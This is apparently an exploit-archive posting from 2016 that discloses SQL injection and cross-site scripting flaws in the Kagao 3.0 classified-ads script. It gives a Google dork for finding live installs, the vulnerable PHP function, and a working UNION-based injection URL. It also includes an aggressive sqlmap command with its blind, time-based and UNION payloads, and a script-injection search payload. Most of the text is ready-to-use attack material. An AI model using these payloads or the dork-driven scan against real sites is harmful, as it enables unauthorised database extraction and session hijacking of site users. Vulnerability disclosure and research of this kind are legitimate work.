Home / os / winmobile

Kagao 3.0 Cross Site Scripting / SQL Injection

Posted on 28 June 2016

###################### # Application Name : Kagao v3.0 - Professional Classified Market # Google Dork : inurl:/cat1.php?id2= # Exploit Author : Cyber Warrior | Bug Researchers Group | N4TuraL # Vendor Homepage : http://kogaoscript.com/ # Vulnerable Type : SQL Injection & Cross Site Scripting # Date : 2016-06-26 # Tested on : Windows 10 / Mozilla Firefox # Linux / Mozilla Firefox # Linux / sqlmap 1.0.6.28#dev ###################### SQL Injection Vulnerability ###################### # Location : http://localhost/[path]/cat1.php ###################### # Vulnerable code : function pagenat(){ $buildLink = array( "id" => intval($_GET['id']), "id2" => isset($_GET['id2']) ? intval($_GET['id2']) : '', "suche" => htmlspecialchars($_GET['suche']), "sucheWo" => htmlspecialchars($_GET['sucheWo']), "umkreis" => intval($_GET['umkreis']), "page" => "" ); $buildLink = http_build_query($buildLink); $buildLink = 'cat1.php?' . $buildLink; if($_GET['id2']){ $pages_num = getZahlPage($_GET['id2'], 'unterkategorie'); } else{ $pages_num = getZahlPage($_GET['id'], 'kategorie'); } $page = (isset($_GET['page'])) ? max($_GET['page'], 1) : 1; $pages = ($pages_num > 1) ? pages($pages_num, $page, $buildLink) : ''; echo $pages; } ###################### # PoC Exploit: http://localhost/[path]/cat1.php?id2=999999.9%22%20union%20all%20select%20concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29%20as%20char%29%29%29%2C0x27%2C0x7e%29--%20a # Exploit Code via sqlmap: sqlmap -u http://localhost/[path]/cat1.php?id2=10 --dbms=mysql --random-agent --technique=BUESTQ --dbs --tamper=versionedkeywords --level=3 --risk=3 --no-cast Parameter: id2 (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id2=10" AND 9863=9863 AND "UvFy"="UvFy Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id2=10" AND SLEEP(5) AND "Zxun"="Zxun Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: id2=-5676" UNION ALL SELECT CONCAT(0x716b786271,0x4e77456d62457a716850544f776d506c7679624969616c6b47417542766c4152464c6a665a7a7064,0x7162767671)-- vvJN --- ###################### Cross Site Scripting Vulnerability ###################### # PoC Exploit: Search: "><script>alert('n4tural');</script> http://localhost/[path]/cat1.php?id2=0&pricestart=0&room=&flache=&price=&zulassung=&kilometer=&kraftstoff=&id3=0&suche=%22%3E%3Cscript%3Ealert%28%27n4tural%27%29%3B%3C%2Fscript%3E&id=0&sucheWo=&umkreis=0 ######################

 

TOP